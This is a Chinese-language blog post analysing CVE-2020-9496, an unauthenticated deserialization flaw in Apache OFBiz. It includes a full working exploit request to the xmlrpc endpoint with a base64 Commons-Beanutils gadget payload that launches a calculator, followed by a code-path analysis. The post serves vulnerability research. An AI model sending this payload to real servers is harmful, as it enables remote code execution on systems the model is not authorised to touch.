March 8, 2024

CVE-2020-9496 Apache OfBiz 反序列化命令执行漏洞

漏洞影响版本

ofbiz< 17.12.04

环境搭建

下载ofbiz、gradle后配置一下gradle的环境变量,随后直接运行gradle.bat进行build,最后./gradlew ofbiz --debug-jvm
调试端口默认是5005
或者你直接idea打开后初始化一下gradle项目
image.png
你会看到有个build,编译好后会出现一个ofbiz.jar
image.png
然后我们运行这个jar包就可以开始debug了。
想调试的时候发现这个漏洞vulhub开放了5005端口但是没开启debug模式啊。。。希望vulhub之后可以加上debug功能。

漏洞复现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
GET /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Cookie: JSESSIONID=F637D1919F66DD42EED9EFF4B139CF3A.jvm1; Phpstorm-b3ad9363=84c4b31e-d5ed-4379-9a80-9b7507cedf1e; Pycharm-69800360=084fccb6-8efb-4ce0-ab83-e9ee9ec90c09; confluence.browse.space.cookie=space-blogposts; sidebar_collapsed=false; Goland-7a35ec7=48e3d45f-8c3b-456a-b871-9a45c9c01e45; cookie_token=ca76b89a250a514dd21370f8310865e199423e79b5b53392404ae1bb2ab24a8c; Phpstorm-b3ad9726=1202f496-542d-4162-91ec-bad957f445b9; lang=zh-cn; device=desktop; theme=default; OFBiz.Visitor=10000
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 1697

<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAAVnK/rq+AAAAMQAZAQABYQcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlBwADDAAFAAYKAAgACQEAEWphdmEvbGFuZy9SdW50aW1lBwALAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADQAOCgAMAA8BAARjYWxjCAARAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEwAUCgAMABUBAApTb3VyY2VGaWxlAQAGYS5qYXZhACEAAgAEAAAAAAABAAEABQAGAAEABwAAABoAAgABAAAADiq3AAq4ABASErYAFlexAAAAAAABABcAAAACABhwdAAIYm9vZ2lwb3BwdwEAeHEAfgANeA==</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

发送以下数据包到xmlrpc接口即可弹出计算器,base64是cb1链
image.png

漏洞分析

流程是比较简单,源自一个接口未授权。
image.png
从漏洞的URL/webapps/control/xmlrpc可以找到web.xml文件,发现是由ControlServlet接管。
image.png
因此定位到doGet方法内部,可以看到首先需要获取RequestHandler
image.png
image.png
读取了controller.xml,我们看看内容
image.png
发现xmlrpc路由的security是false,也就是不需要鉴权的。因此我们得以后续利用。
image.png
在doGet后面我们会进入doRequest方法内部
image.png
进而进入runEvent方法
image.png
进入XmlrpcRequestHandler的execute方法,首先获取了xmlrpc的config,然后读取了body流。
image.png
最后交给SAXParsers去处理。
在扫描xml的标签的时候会进入getparser方法获取对应tags的parser
image.png
image.png
如果是serializable标签那么就返回SerializableParser
image.png
它的父类是ByteArrayParser,在最后会调用startElement方法image.png
这里解密了我们的base64数据。最后在SerializerParser的getResult方法进行反序列化。
image.png
ofbiz内置cb依赖,因此可以打cb链。
image.png

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#Java#CVE